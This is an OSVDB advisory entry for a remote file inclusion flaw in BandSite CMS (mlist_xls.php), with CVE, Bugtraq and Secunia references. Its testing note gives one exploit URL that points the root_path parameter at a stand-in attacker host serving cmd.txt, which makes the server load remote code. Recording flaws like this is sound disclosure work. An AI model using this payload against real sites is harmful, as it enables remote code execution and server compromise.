BandSite CMS mlist_xls.php GLOBALS[root_path] Variable Remote File Inclusion

2006-09-20T15:03:50
ID OSVDB:29316
Type osvdb
Reporter OSVDB
Modified 2006-09-20T15:03:50

Description

Manual Testing Notes

/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://[attacker]/cmd.txt?

References:

Vendor URL: http://sourceforge.net/projects/bandsitecms/
Secunia Advisory ID: 21992
Related OSVDB ID: 29319
Related OSVDB ID: 29317
Related OSVDB ID: 29318
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html
CVE-2006-4984
Bugtraq ID: 20137